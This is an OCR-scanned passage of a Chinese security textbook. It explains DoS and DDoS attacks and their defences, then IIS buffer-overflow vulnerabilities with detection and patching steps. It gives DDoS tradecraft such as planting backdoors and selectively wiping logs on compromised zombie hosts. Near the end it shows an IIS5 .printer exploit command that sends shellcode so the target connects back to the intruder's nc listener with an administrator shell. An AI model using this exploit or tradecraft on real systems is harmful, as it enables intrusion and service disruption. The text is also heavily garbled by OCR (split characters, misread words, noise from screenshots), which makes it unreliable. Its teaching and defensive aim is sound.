的 UDP 连接 , 回复 地 址 指向 开 着 Echo 服务 的 一 台 主 机 , 通过 将 Chargen 和 Echo 服务 互 指 ， 
来 回 传送 毫 无 用 处 且 占 满 带宽 的 垃圾 数据 ， 在 两 台 主 机 之 间 生 成 足够 多 的 无 用 数据 流 ， 这 
一 拒绝 服务 攻击 飞快 地 导致 网 络 可 用 带宽 耗 尽 。 

5. UDP flood 攻击 

UDP 淹没 攻击 是 导致 基于 主机 的 服务 拒绝 攻击 的 一 种 。UDP 是 一 种 无 连接 的 协议 ， 
而 且 它 不 需要 用 任何 程序 建立 连接 来 传输 数据 。 当 攻击 者 随机 地 向 受害 系统 的 端口 发 送 
UDP 数据 包 的 时 候 ， 就 可 能 发 生 了 UDP 淹没 攻击 。 当 受害 系统 接收 到 一 个 UDP 数据 包 的 
时 候 ， 它 会 确定 目的 端口 正在 等 待 中 的 应 用 程序 。 当 它 发 现 该 端口 中 并 不 存在 正在 等 待 的 
应 用 程序 ， 它 就 会 产生 一 个 目的 地 址 无 法 连接 的 ICMP 数据 包 发 送 给 该 伪造 的 源 地 址 。 如 
果 向 受害 者 计算 机 端口 发 送 了 足够 多 的 UDP 数据 包 的 时 候 ， 整 个 系统 就 会 瘫痪 。 

6. Land (Land Attack) 攻 击 


在 Land 攻击 中 ， 黑 客 利用 一 个 特别 打造 的 SYN 包 一 一 它 的 原 地 址 和 目标 地 址 都 被 设 
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置 成 某 一 个 服务 器 地 址 进行 攻击 。 此 举 将 导致 接收 服务 器 向 它 自己 的 地 址 发 送 SYN-ACK 
消息 , 结果 这 个 地 址 又 发 回 ACK 消息 并 创建 一 个 空 连接 , 每 一 个 这 样 的 连接 都 将 保留 直到 
超时 ， 在 Land 攻击 下 ， 许 多 UNIX 将 崩溃 ，NT 变 得 极其 缓慢 (大 约 持续 五 分 钟 )。 

7. Smurf 攻击 


Smurf 攻击 是 以 最 初 发 动 这 种 攻击 的 程序 名 “Smurf” 来 命名 的 。 这 种 攻击 方法 结合 使 
用 了 下 欺骗 和 ICMP 回复 方法 使 大 量 网 络 传输 充斥 目标 系统 , 引起 目标 系统 拒绝 为 正常 系 
统 进行 服务 。Smurf 攻击 通过 使 用 将 回复 地 址 设置 成 受害 网 络 的 广播 地 址 的 ICMP 应 答 请 
求 (ping) 数 据 包 ， 来 淹没 受害 主机 ， 最 终 导 致 该 网 络 的 所 有 主机 都 对 此 ICMP 应 答 请 求 做 出 
答复 ， 导 致 网 络 阻塞 。 更 加 复杂 的 Smurf 将 源 地 址 改 为 第 三 方 的 受害 者 ， 最 终 导致 第 三 方 
骨 湿 。 


3.1.4 ”分 布 式 拒绝 服务 


分 布 式 拒绝 服务 攻击 DDoS(Distributed Denial of Service) 是 对 传统 拒绝 服务 攻击 的 发 
展 ， 攻 击 者 向 网 络 服务 器 发 起 众多 携带 非法 IP 地 址 的 服务 请 求 ， 服 务 器 在 回复 该 请 求 后 进 
入 等 待 客户 端 回 传 消息 的 状态 。 由 于 上 述 人 P 地 址 是 人 为 伪造 的 ， 服 务 器 一 般 不 会 等 到 所 需 
要 的 回应 对 话 ， 因 此 分 配给 该 次 请 求 的 系统 资源 就 始终 没有 正常 释放 。 当 然 ， 在 服务 器 等 
待 一 定时 间 后 ， 网 络 连 接 会 因为 超时 而 被 强制 切断 ， 此 时 攻击 者 会 发 送 新 一 轮 的 服务 请 求 ， 
在 这 种 周期 性 发 起 的 非法 IP 地 址 请 求 的 作用 下 ， 服 务 器 资源 最 终 会 被 完全 耗 尽 。 如 图 3-2 
所 示 。 
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3-2 ”典型 的 DDoS 攻击 示意 图 


一 般 来 说 ， 分 布 式 拒绝 服务 攻击 DDoS 攻击 通常 会 经 过 3 个 步骤 : @ 搜 集 了 解 攻击 目 
标的 具体 情况 ; @ 占 领 控制 和 攻击 倪 价 机 ; @ 实 施 分 布 式 拒绝 服务 攻击 。 相对 完善 的 DDoS 
攻击 体系 大 致 可 以 分 成 4 大 部 分 : 黑客 (Intruder)、 控 制 机 (Master)、 攻 击 机 (Daemon) 和 受害 
者 (Victims)。 其 中 前 3 部 分 组 成 上 述 体系 结构 中 的 攻击 发 起 和 实施 部 分 。 

先 来 看 一 下 最 重要 的 控制 机 和 攻击 机 ， 它 们 分 别 用 做 控制 和 实际 发 起 攻击 。 请 注意 控 
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制 机 与 攻击 机 的 区 别 ， 对 受害 者 来 说 ，DDoS 的 实际 攻击 包 是 受害 者 攻击 倪 癸 机 时 发 出 的 ， 
控制 机 只 发 布 命令 而 不 参与 实际 的 攻击 。 对 控制 机 和 攻击 机 ， 黑 客 有 控制 权 或 者 是 部 分 的 
控制 权 ， 并 把 相应 的 DDoS 程序 上 传 到 这 些 平 台 上 ， 这 些 程序 与 正常 的 程序 一 样 运行 并 等 
待 来 自 黑客 的 指令 ， 通 常 它 还 会 利用 各 种 手段 隐藏 自己 ， 不 被 别人 发 现 。 在 平时 ， 这 些 倪 
伟 机 器 并 没有 什么 异常 ， 只 是 一 旦 黑客 连接 到 它们 进行 控制 ， 并 发 出 指令 的 时 候 ， 攻 击 倪 
儒 机 就 成 为 害 人 者 去 发 起 攻击 了 。 

为 什么 黑客 不 直接 去 控制 攻击 机 ， 而 要 从 控制 倪 儒 机 上 转 一 下 呢 ? 因为 这 样 可 以 使 
DDoS 攻击 难以 追查 。 从 攻击 者 的 角度 来 说 ， 肯 定 不 愿意 被 捉 到 ， 而 攻击 者 使 用 的 倪 偶 机 
越 多 ， 他 实际 上 提供 给 受害 者 的 分 析 依 据 就 越 多 。 在 占领 一 台 机 器 后 ， 高 水 平 的 攻击 者 会 
首先 做 两 件 事 : 一 是 考虑 如 何 留 好 后 门 ， 二 是 如 何 清理 日 志 。 这 就 是 擦 掉 脚印 ， 不 让 自己 
做 的 事 被 别人 察觉 到 。 比 较 不 敬业 的 黑客 会 把 日 志 全 都 删 掉 ， 如 果 这 样 ， 网 管 员 发 现 日 志 
都 没 了 就 会 知道 有 人 干 了 坏事 ， 顶 多 是 无 法 从 日 志 中 发 现 是 谁 干 的 而 已 。 相 反 ， 真 正 的 好 
手 会 挑 与 自己 有 关 的 日 志 项 目 删 掉 ， 让 人 看 不 到 异常 的 情况 。 这 样 可 以 长 时 间 地 利用 倪 偶 
机 。 但 是 清理 攻击 机 上 的 日 志 确实 是 一 项 繁重 的 任务 ， 即 使 在 有 很 好 的 日 志清 理工 具 的 帮 
助 下 ， 黑 客 也 是 对 这 个 任务 很 头痛 的 。 这 就 导致 了 有 些 攻击 机 的 日 志清 理 的 不 是 很 干净 ， 
通过 它 上 面 的 线索 找到 了 控制 它 的 上 一 级 计算 机 ， 这 上 一 级 的 计算 机 如 果 是 黑客 自己 的 机 
器 ， 那 么 他 就 会 被 掀 出 来 了 。 但 如 果 这 是 控制 用 的 倪 儒 机 的 话 ， 黑 客 自 身 还 是 安全 的 。 控 
制 伯 仿 机 的 数目 相对 很 少 ， 一 般 一 台 可 以 控制 几 十 台 攻 击 机 ， 清 理 一 台 计 算 机 的 日 志 对 黑 
客 来 讲 就 轻松 多 了 ， 这 样 从 控制 机 再 找到 黑客 的 可 能 性 也 大 大 降低 了 。 

被 DDoS 攻击 时 的 现象 : 

(1) 被 攻击 主机 上 有 大 量 等 待 的 TCP 连接 。 

(2) 网 络 中 充斥 着 大 量 的 无 用 数据 包 ， 源 地 址 为 假 的 。 

(3) 制造 高 流量 无 用 数据 ， 造 成 网 络 拥塞 ， 使 受害 主机 无 法 正常 和 外 界 通联 系 。 

(4) 利用 受害 主机 提供 的 服务 或 传输 协议 上 的 缺陷 , 反复 高 速 地 发 出 特定 的 服务 请 求 ， 
使 受害 主机 无 法 及 时 处 理 所 有 正常 请 求 。 

(5) 严重 时 会 造成 系统 死机 。 

那么 黑客 是 如 何 组 织 一 次 DDoS 攻击 的 ? 这 里 用 “组 织 ” 这 个 词 ， 是 因为 DDoS 并 不 
像 入 侵 一 台 主 机 那样 简单 。 一 般 来 说 ， 黑 客 进 行 DDoS 攻击 时 会 经 过 下 面 的 步骤 。 

1) “搜集 了 解 目标 的 情况 

下 列 情 况 是 黑客 非常 关心 的 情报 : 

(1) 被 攻击 目标 主机 数目 、 地 址 情况 。 

(2) 目标 主机 的 配置 、 性 能 。 

(3) 目标 的 带宽 。 

对 于 DDoS 攻击 者 来 说 ， 攻 击 Intemet 上 的 某 个 站 点 ， 如 http:/Wwww.mytarget.com， 习 
点 是 要 确定 到 底 有 多 少 台 主 机 在 支持 这 个 站 点 ， 一 个 大 的 网 站 可 能 有 很 多 台 主 机 利用 负载 
均衡 技术 为 其 提供 相同 的 www 服务 。 以 http://www. mytarget.com 为 例 ， 下 列 地 址 都 是 提 
供 http:/www. mytarget.com 服务 的 : 

82.218.71.87 

82.218.71.88 


mh 
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82.218.71.89 
82.218.71.80 

82.218.71.81 

82.218.71.83 

82.218.71.84 

82.218.71.86 

如 果 要 进行 DDoS 攻击 的 话 ， 应 该 攻击 哪 一 个 地 址 呢 ? 使 82.218.71.87 这 台 机 器 瘫 掉 ， 
但 其 他 的 主机 还 是 能 向 外 提供 www 服务 , 所 以 想 让 别人 访问 不 到 http://www. mytarget.com 
的 话 ， 必 须 是 所 有 这 些 IP 地 址 的 机 器 都 瘫 掉 才 行 。 在 实际 的 应 用 中 ， 一 个 下 地 址 往往 还 
代表 着 数 台 机 器 : 网 站 维护 者 使 用 了 四 层 或 七 层 交换 机 来 做 负载 均衡 ,把 对 一 个 他 地 址 的 
访问 以 特定 的 算法 分 配 到 下 属 的 每 个 主机 上 去 。 这 时 对 于 DDoS 攻击 者 来 说 情况 就 更 复杂 
了 ， 他 面 对 的 任务 可 能 是 让 几 十 台 主 机 的 服务 都 不 正常 。 

所 以 说 事先 搜集 情报 对 DDoS 攻击 者 来 说 是 非常 重要 的 ， 这 关系 到 使 用 多 少 台 倪 儒 机 
才能 达到 效果 的 问题 。 简 单 地 考虑 一 下 ， 在 相同 的 条 件 下 ， 攻 击 同一 站 点 的 2 台 主 机 需要 
2 台 倪 仿 机 的 话 ， 攻 击 5 台 主 机 可 能 就 需要 5 台 以 上 的 倪 儒 机 。 有 人 说 做 攻击 的 倪 介 机 越 
多 越 好 ， 不 管用 户 有 多 少 台 主 机 我 们 都 用 尽量 多 的 倪 儒 机 来 攻 就 是 了 ， 反 正 参与 攻击 的 倪 
儒 机 越 多 效果 就 更 好 。 

但 在 实际 过 程 中 ， 有 很 多 黑客 并 不 进行 情报 的 搜集 而 直接 进行 DDoS 的 攻击 ， 这 时 候 
攻击 的 盲目 性 就 很 大 了 ， 效 果 如 何 也 要 靠 运气 。 其 实 做 黑客 也 像 网 管 员 一 样 ， 是 不 能 偷懒 
的 。 一 件 事 做 得 好 与 坏 ， 态 度 最 重要 ， 水 平 还 在 其 次 。 

2) 占领 倪 介 机 

黑客 最 感 兴趣 的 主机 有 下 列 几 种 : 

(1) 链 路 状态 好 的 主机 。 

(2) 性 能 好 的 主机 。 

(3) 安全 管理 水 平 差 的 主机 。 

这 一 部 分 实际 上 是 使 用 了 另 一 大 类 的 攻击 手段 :利用 形 攻 击 。 这 是 和 DDoS 并 列 的 攻 
击 方式 。 简 单 地 说 ， 就 是 占领 和 控制 被 攻击 的 主机 ， 取 得 最 高 的 管理 权限 ， 或 者 至 少 得 到 
一 个 有 权限 完成 DDoS 攻击 任务 的 账号 。 对 于 一 个 DDoS 攻击 者 来 说 ， 准 备 好 一 定数 量 的 
倪 偶 机 是 一 个 必要 的 条 件 ， 下 面 说 一 下 攻击 者 是 如 何 攻击 并 占领 它们 的 。 

首先 ， 黑 客 做 的 工作 一 般 是 扫描 ， 随 机 地 或 者 是 有 针对 性 地 利用 扫描 器 去 发 现 Intemet 
上 那些 有 漏洞 的 机 器 ， 像 程序 的 溢出 漏洞 、 公 共 网 关 接口 、 统 一 码 、 事 件 传输 协议 、 数 据 
库 漏洞 ……( 人 简直 举 不 胜 举 )， 都 是 黑客 希望 看 到 的 扫描 结果 。 随 后 就 是 尝试 入 侵 了 ， 上 有 具体 
的 手段 就 不 在 这 里 多 说 了 ， 感 兴趣 的 话 网 上 有 很 多 关于 这 些 内 容 的 文章 。 

总 之 黑客 现在 占领 了 一 台 倪 俐 机 了 :! 然后 他 做 什么 呢 ? 除了 上 面 说 过 留 后 门 探 脚印 这 
些 基 本 工作 之 外 ,他 会 把 DDoS 攻击 用 的 程序 下 载 过 去 , 一 般 是 利用 fp 来 完成 的 。 在 攻击 
机 上 ， 会 有 一 个 DDoS 的 发 包 程 序 ， 黑 客 就 是 利用 它 来 向 受害 目标 发 送 恶意 攻击 包 的 。 

3) ”实际 攻击 

经 过 前 2 个 阶段 的 精心 准备 之 后 ， 黑 客 就 开始 瞄准 目标 准备 发 射 了 。 前 面 的 准备 做 得 
好 的 话 ， 实 际 攻击 过 程 反而 是 比较 简单 的 。 就 像 图 3-2 显示 里 的 那样 ， 黑 客 登 录 到 作为 控 
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制 台 的 侈 候 机 ， 向 所 有 的 攻击 机 发 出 命令 。 这 时 候 在 攻击 机 中 的 DDoS 攻击 程序 就 会 响应 
控制 台 的 命令 ， 一 起 向 受害 主机 以 高 速度 发 送 大 量 的 数据 包 ， 导 致 它 死机 或 是 无 法 响应 正 
常 的 请 求 。 黑 客 一 般 会 以 远 远 超 出 受害 方 处 理 能 力 的 速度 进行 攻击 。 

有 经 验 的 攻击 者 一 边 攻击 ， 还 会 用 各 种 手段 来 监视 攻击 的 效果 ， 在 需要 的 时 候 进 行 一 
些 调 整 。 简 单 些 就 是 开 个 窗口 不 断 地 Ping 目标 主机 ， 在 能 接 到 回应 的 时 候 就 再 加 大 一 些 流 
量 或 是 再 命令 更 多 的 倪 儒 机 来 加 入 攻击 。 


3.1.5 ”拒绝 服务 攻击 的 防护 


尽管 多 年 来 全 球 无 数 网 络 安全 专家 都 在 着 力 开发 DoS 攻击 的 解决 办 法 , 但 到 目前 为 止 
收效 不 大 , 这 是 因为 Dog 攻击 利用 了 TCP 协议 本 身 的 弱点 。 DoS 攻击 使 用 相对 简单 的 攻击 
方法 ， 可 以 使 目标 系统 完全 瘫痪 ， 甚 至 破坏 整个 网 络 。 因 此 Extreme Networks 认为 ， 只 有 
从 网 络 的 全 局 着 眼 ， 在 网 间 基 础 设施 的 各 个 层面 上 采取 应 对 措施 ， 包 括 在 局 域 网 层面 上 采 
用 特殊 措施 ， 及 在 网 络 传输 层面 上 进行 必要 的 安全 设置 ， 并 安装 专门 的 DoS 识别 和 预防 工 
具 ， 才 能 最 大 限度 地 减少 Dog 攻击 所 造成 的 损失 。 

不 过 即使 它 难以 防范 ， 我 们 也 不 应 该 坐 以 待 毙 ， 实 际 上 防止 DoS 并 不 是 绝对 不 可 行 的 
事情 。 互 联网 的 使 用 者 是 各 种 各 样 的 ， 与 DoS 作 斗 争 ， 不 同 的 角色 有 不 同 的 任务 。 我 们 下 
面 列 出 了 几 种 典型 的 角色 : 

(1) 企业 网 管理 员 。 

(2) SP、ICP 管理 员 。 

(3) 骨干 网 络 运营 商 。 

(4) 企业 网 管理 员 。 

网 管 员 作 为 一 个 企业 内 部 网 的 管理 者 ， 往 往 也 是 安全 员 、 守 护 神 。 在 他 维护 的 网 络 中 
有 一 些 服务 器 需要 向 外 提供 WWW 服务 ,因而 不 可 避免 地 成 为 Dog 的 攻击 目标 , 他 该 如 何 
做 呢 ? 可 以 从 主机 与 网 络 设备 两 个 角度 去 考虑 。 

1. 主机 上 的 设置 

几乎 所 有 的 主机 平台 都 有 抵御 Dos 的 设置 ， 总 结 一 下 ， 主 要 有 以 下 几 种 。 

(1) 关闭 不 必要 的 服务 。 

(2) 限制 同时 打开 的 Syn 半 连 接 数 目 。 

(3) 缩短 Syn 半 连 接 的 time out 时 间 。 

(4) 及 时 更 新 系统 补丁 。 


2. 网 络 设备 上 的 设置 


企业 网 的 网 络 设备 可 以 从 防火 墙 与 路 由 器 上 考虑 。 这 两 个 设备 是 连接 外 界 的 接口 设备 ， 
在 进行 防 DoS 设置 的 同时 ， 要 注意 一 下 这 是 以 多 大 的 效率 牺牲 为 代价 的 ， 对 用 户 来 说 这 是 
否 值得 。 

1) ”防火 墙 

(1) 禁止 对 主机 的 非 开放 服务 的 访问 。 

(2) 限制 同时 打开 的 SYN 最 大 连接 数 。 
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(3) 限制 特定 他 地 址 的 访问 。 

(4) 启用 防火 墙 的 防 DDoS 的 属性 。 

(5) 严格 限制 对 外 开放 的 服务 器 的 向 外 访问 。 

第 (5) 项 主要 是 防止 自己 的 服务 器 被 当 作 工具 去 害 人 。 

2) ”路 由 器 

以 Cisco 路 由 器 为 例 : 

(1) Cisco Express Forwarding(CEF)。 

(2) 使 用 Unicast reverse-path 。 

(3) 访问 控制 列表 (ACL) 过 滤 。 

(4) 设置 SYN 数据 包 流 量 速率 。 

(5) 升级 版 本 过 低 的 ISO。 

(6) 为 路 由 器 建立 log server。 

其 中 使 用 CEF 和 Unicast 设置 时 要 特别 注意 ， 使 用 不 当 会 造成 路 由 器 工作 效率 严重 下 
降 ， 升 级 IOS 也 应 谨慎 。 

3. ISP /1CP 管理 员 


ISP / ICP 为 很 多 中 小 型 企业 提供 了 各 种 规模 的 主机 托管 业务 ， 所 以 在 防 DoS 时 ， 除 了 
用 与 企业 Z 网 管理 员 一 样 的 手段 外 ， 还 要 特别 注意 自己 管理 范围 内 的 客户 托管 主机 不 要 成 
为 倪 癸 机 。 客 观 上 说 , 这 些 托管 主机 的 安全 性 普遍 是 很 差 的 , 很 容易 成 为 黑客 最 喜欢 的 “ 肉 
鸡 ”， 因 为 不 管 黑客 怎么 用 这 台 机 器 都 不 会 有 被 发 现 的 危险 ， 它 的 安全 管理 太 差 了 。 而 作 
为 ISP 的 管理 员 ， 对 托管 主机 没有 直接 管理 的 权力 ， 只 能 通知 让 客户 来 处 理 。 在 实际 情况 
中 ， 有 很 多 客户 与 自己 的 托管 主机 服务 商 配 合 得 不 是 很 好 ， 造 成 了 ISP 管理 员 明 知 自己 负 
责 的 一 台 托 管 主 机 成 为 了 倪 偶 机 ， 但 却 没有 什么 办 法 解决 的 局 面 。 

4. 骨干 网 络 运营 商 

他 们 提供 了 Intemet 存在 的 物理 基础 。 如 果 骨 干 网 络 运营 商 可 以 很 好 地 合作 的 话 ，DoS 
攻击 可 以 很 好 地 被 预防 。 在 2000 年 ，yahoo 等 知名 网 站 被 攻击 后 ， 美 国 的 网 络 安 全 研究 机 
构 提 出 了 骨干 运营 商 联手 来 解决 DoS 攻击 的 方案 。 其 实 方法 很 简单 ， 就 是 每 家 运营 商 在 自 
己 的 出 口 路 由 器 上 进行 源 瑟 地 址 的 验证 , 如 果 在 自己 的 路 由 表 中 没有 看 到 这 个 数据 包 源 卫 
和 路由， 就 丢掉 这 个 包 。 这 种 方法 可 以 阻止 黑客 利用 伪造 的 源 卫 来 进行 DogS 攻击 。 不 过 
同样 ， 这 样 做 会 降低 路 由 器 的 效率 ， 这 也 是 骨干 运营 商 非常 关注 的 问题 ， 所 以 这 种 做 法 真 
正 实施 起 来 还 很 困难 。 
对 DoS 的 原理 与 应 付 方法 的 研究 一 直 在 进行 中 ,找到 一 个 既 有 效 又 切实 可 行 的 方案 不 
是 一 朝 一 夕 的 事情 。 但 目前 我 们 至 少 可 以 做 到 把 自己 的 网 络 与 主机 维护 好 ， 首 先 让 自己 的 
主机 不 成 为 攻击 者 利用 的 对 象 去 攻击 别人 ; 其 次 ， 在 受到 攻击 的 时 候 ， 要 尽量 保存 证 据 ， 
以 便 事 后 追查 ， 一 个 良好 的 网 络 和 日 志 系统 是 必要 的 。 无 论 DDoS 的 防御 向 何 处 发 展 ， 这 
都 将 是 一 个 社会 工程 ， 需 要 IT 界 的 同行 们 来 一 起 关注 ， 通 力 合作 。 


} 
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3.2 ”基于 漏洞 入 侵 的 防护 方法 


任何 系统 都 不 是 完美 的 ， 在 设计 和 实现 上 总 是 存在 或 多 或 少 的 缺陷 ， 有 的 缺陷 是 系统 
天 生 的 ， 有 的 缺陷 是 设计 上 的 不 合理 ， 甚 至 有 些 缺 陷 是 开发 者 故意 留 下 的 。 如 果 能 从 中 找 
到 一 些 瑕 竟 ， 并 巧妙 地 对 其 进行 利用 ， 便 可 以 绕 过 系统 的 认证 直接 进入 系统 内 部 ， 这 就 是 
基于 漏洞 的 入 侵 。 


3.2.1 ”基于 IIS 漏洞 入 侵 的 防护 方法 


IIS 被 称 为 nternet 信 息 服务 器 。 它 是 在 Windows 系 统 中 提供 Interet 服 务 ,作为 Windows 
组 件 附加 在 Windows 系统 中 。 通 过 IS，Windows 系统 的 用 户 可 以 方便 地 提供 Web 服务 、 
FTP 服务 、SMTP 服务 等 。 

IIS 服务 器 在 方便 用 户 的 同时 ， 也 带 来 了 许多 安全 隐患 。 据 说 IIS 的 漏洞 有 千 余 种 ， 能 
被 用 来 入 侵 的 漏洞 大 多 数 属于 “溢出 ”型 漏洞 。 对 于 这 种 漏洞 ， 入 侵 者 能 够 通过 发 送 特定 
格式 的 数据 来 使 远程 服务 器 缓冲 区 溢出 ， 从 而 突破 系统 的 保护 ， 在 溢出 后 的 空间 中 执行 任 
何 命令 。 

IIS 主要 有 以 下 5 种 漏洞 : 

(1) .ida& .idq 漏洞 。 

(2) .printer 漏洞 。 

(3) Unicode 漏洞 。 

(4) .asp 映射 分 块 编码 漏洞 。 

(5) WebDAYV 漏洞 。 

只 要 IIS 服务 器 中 存在 其 中 的 任意 一 种 漏洞 ， 都 可 导致 入 侵 ， 入 侵 者 在 入 侵 远程 IS 服 
务 器 之 前 ， 会 使 用 很 多 手段 来 搜集 一 些 关 键 信息 。 例 如 利用 专门 的 扫描 器 对 远程 的 IS 服 
务 器 的 信息 进行 搜集 。 

1. .ida&.idq 漏洞 

1) “漏洞 描述 

IIS 的 index server .ida/.idq ISAPI 扩展 存在 远程 缓冲 溢出 漏洞 , 攻击 者 可 以 利用 该 漏洞 
获得 Web 服务 器 的 System 权限 来 访问 远程 系统 。 

受 影响 的 操作 系统 : 


Microsoft Windows NT 4.0(sp0-sp6) 
Microsoft Windows 2000(sp0-sp2) 


详细 描述 : 
< *IIS 4.0/5.0 Index Server and Indexing Service ISAPI Extension Buffer 


overflow * > 


< keyword: ISAPI Extension Buffer overflow > 
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微软 的 Index Server 可 以 加 快 Web 的 搜索 能 力 , 提供 对 管理 员 脚 本 和 Internet 数据 的 
查询 ， 默 认 支 持 管理 脚本 .ida 和 查询 脚本 .idq， 不 过 都 是 使 用 idq.dll 来 进行 解析 的 。 但 是 
Index Server 存在 一 个 缓冲 溢出 ， 其 中 问题 存在 于 idq.dll 扩展 程序 上 ， 由 于 没有 对 用 户 提交 的 
输入 数据 进行 边界 检查 ， 可 以 导致 远程 攻击 者 利用 溢出 获得 System 权限 来 访问 远程 系统 。 

2) ”漏洞 检测 

下 面 分 别 从 手工 和 工具 检测 两 种 方法 来 介绍 入 侵 者 如 何 得 知 远程 服务 器 中 的 IIS 存 
在 .ida&.idq 漏洞 。 

(1) 手工 检测 。 

在 客户 端正 的 地 址 栏 中 输入 “http://targetIP/*.ida” 或 “http://targetIP/*.idq”, 其 中 targetIP 
为 远程 服务 器 的 瑟 地 址 或 域名 。 填 入 地 址 , 回 车 确认 后 , 如 果 返 回 类 似 如 图 3-3 所 示 的 “ 找 
不 到 ** 文 件 ” 的 信息 ， 就 说 明 远 程 服务 器 中 的 IS 服务 器 存在 .ida&.idq 漏洞 。 


ETT TE Ey 
四 与 -四 -上 国 国 名 户 峡 丙 tmx 加 合生 


地 址 加 | 。 http:/1192.168.254.128/1.ida 


图 3-3 .ida&.idq 漏洞 检测 
(2) 工具 检测 。 
很 多 扫描 器 都 可 以 检测 出 远程 服务 器 中 IIS 的 .ida&.idq 漏洞 。 此 外 ， 网 管 也 可 以 通过 
这 些 扫描 器 对 自己 的 服务 器 进行 安全 检测 。 这 里 只 介绍 如 何 使 用 X-Scan 来 检测 .ida&.idq 
漏洞 。 首先 ， 打 开 扫 描 器 X-Scan， 然 后 在 “扫描 模块 ”中 选中 “IIS 漏洞 ”， 如 图 3-4 所 示 。 


3-4 X-Scan 扫描 模块 


最 后 在 “扫描 参数 ”中 填 入 远程 服务 器 的 人 P 地 址 或 域名 , 开始 扫描 。 如 果 得 到 如 图 3-5 
所 示 的 扫描 结果 : “可 能 存在 “IIS Index Server ISAPI 扩展 远程 溢出 ”漏洞 (NULL.ida) ” 
或 “可 能 存在 “IIS Index Server ISAPI 扩展 远程 溢出 ”漏洞 (NULL.idq )”， 则 说 明和 远程 服 
务 器 可 能 存在 .ida&.idq 漏洞 。 
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另外 ， 还 需要 说 明 的 是 ， 由 于 漏洞 的 溢出 是 通过 远程 主机 的 80 端口 进行 的 ， 对 于 提 
供 Web 服务 的 服务 器 来 说 ， 它 的 防火 墙 并 不 会 拦截 通 往 这 一 端口 的 数据 。 也 就 是 说 ， 即 使 


远程 服务 器 装 有 网 络 防火 墙 ， 


透 过 一 定 配置 的 防火 墙 ， 不 过 需要 使 用 ISIDQ 的 方式 二 


- ida &. idq 游 出 也 容易 成 功 。 至 于 溢出 后 的 连接 ， 也 是 可 以 


连接 。 在 第 2 种 连接 方式 下 ,远程 


服务 器 会 主动 连接 入 侵 者 ， 而 有 些 防 火 墙 并 不 会 拦截 由 内 部 向 外 发 送 的 数据 。 


文件 中 编辑 人 E) 查看 WD 收 荐 由 工具 CD) 帮助 中 


© 人 昌 - 且 目的 有 时 去 Wx @ 人 -学 回 - 


地 让 加 | http://192. 168.254.128.htn 


可 能 存在 “IIS. asp 映 射 分 块 编码 远程 缓冲 区 溢出 “漏洞 


可 能 存在 “IIS Index Server ISAPI 扩 展 远程 溢出 "漏洞 (/NULL. ida) 
可 能 存在 “IIS Index Server ISAPI 扩 展 远程 突出 “ 漏 济 (/NULL. ida) 
可 能 存在 “IIS Index Server ISAPI 扩 展 远程 祷 出 “漏洞 /NULL. idq) 


播 件 类 型 ，HTTP 
插件 成 员 名 称 ，IIS 漏 洞 
| 插件 作者 ，glacier 


3-5 IIS Index Server ISAPI 扩展 远程 溢出 漏洞 


3) ”安全 解决 方案 

(1) 为 Windows 2000 操作 系统 安装 SP4 补丁 。 
(2) 为 该 漏洞 安装 补丁 。 

(3) 删除 .ida&.idq 的 脚本 映射 。 


在 IS 管理 器 的 属性 中 删除 对 .idq 和 .ida 的 脚本 映射 ， 也 可 解决 该 漏洞 


同 带 来 的 安全 隐 


患 。 不 过 需要 注意 的 是 : 如 果 以 后 安装 其 他 系统 组 件 ， 可 能 导致 该 映射 被 重新 自动 安装 ， 
而 且 即 使 Index Server/Indexing Service 没有 开启 ， 但 是 只 要 对 .idq 或 .ida 文件 的 脚本 映射 


存在 ， 攻 击 者 也 能 利用 此 漏洞 。 
没有 安装 


不 过 对 于 已 经 安装 了 Index server 或 Index Services， 但 是 
IIS 的 系统 并 无 此 漏洞 。 建 议 即 使 已 经 为 该 漏洞 安装 了 补丁 最 好 还 是 删除 .IDA 映 


射 。 删 除 方法 : 打开 Intermet 服务 管理 器 ; 右 击 服务 器 并 在 菜单 中 选择 “属性 ”命令 ,选择 


“ 主 属性 ”， 选 择 “WWW 服务 ” 
中 删除 .ida 和 .idq 映射 的 请 求 。 


2. .printer 漏洞 
1) “漏洞 描述 


一 “编辑 ” 


受 影响 系统 : 

Microsoft Windows 2000 Server 

Microsoft Windows 2000 Datacenter Server 
Microsoft Windows 2000 Advanced Server 
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一 “ 主 目录 ” 


一 “配置 ”， 在 扩展 名 列表 


Windows 2000 IIS 5.0 .print ISAPI 扩展 存在 缓冲 区 溢出 漏洞 。 


Windows 2000 IIS 5.0 存在 打印 扩展 ISAPI(Intemet Services Application Programming 


Interface)， 使 .printer 扩展 与 msw3prt.dll 进行 映射 ， 该 扩展 可 以 通过 Web 调用 打印 机 。 
Windows2000 打印 ISAPI 扩展 接口 建立 了 .printer 扩展 名 到 msw3Prt.dll 的 映射 关系 ， 默 认 


情况 下 存在 ， 


并 会 处 理 用 户 请 求 ， 但 在 msw3Prtdll 文件 中 存在 缓冲 溢出 漏洞 ， 


“Host:” 栏 
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(HTTP.printer 请 求 格式 ) 中 包含 大 约 420 字 节 的 HTTP.printer 请 求 给 服务 器 ， 就 可 以 导致 
缓冲 溢出 并 执行 任意 代码 。 一 般 情况 下 攻击 会 使 Web 服务 器 停止 响应 ， 但 Windows 2000 
会 检测 到 Web 服务 没有 响应 而 重新 启动 服务 器 ， 因 此 ， 管 理 员 比较 难 发 现 这 种 攻击 。 

该 漏洞 非常 危险 , 仅仅 需要 Windows2000 打开 80 端口 (HTTP ) 或 者 443 端口 (HTTPS ) ， 
微软 公司 强烈 要 求 在 未 安装 补丁 之 前 一 定 要 移 除 ISAPI 网 络 打 印 的 映射 。 

2) ”漏洞 检测 

打开 X-Scan 扫描 IS 漏洞 ， 如 果 得 到 “可 能 存在 IS 5.0.printer 远程 缓冲 区 溢出 漏洞 ” 
则 说 明 该 远程 服务 器 存在 .printer 漏洞 。 

3) ”漏洞 利用 

(1) 使 用 工具 IIS5 .Printer Exploit 进行 漏洞 利用 。 

命令 格式 : IIS5ExPloft < 目标 他 > < 入 侵 者 人 > < 本 地 监听 端口 > 

使 用 方法 : 


D:\>IISSExploit 210.*.*95 210.30.*.* 250 


==IIS5 English Version .Printer 


Exploit 
===Written by Assassin 1995-2001 . http:// www.netxeyes .com 一 == 
Conneotiog 2 5 
Send Shell Code … OK 
IIS5 Shell Code Send OK 


输入 上 述 命 令 后 稍 等 片刻 ， 如 果 漏 洞 溢出 成 功 便 会 在 本 机 nc 监听 的 窗口 中 出 现 ， 此 时 
入 侵 者 便 得 到 远程 服务 器 管理 员 的 Shell。 

(2) 使 用 工具 iisx v0.3 进行 漏洞 溢出 。 

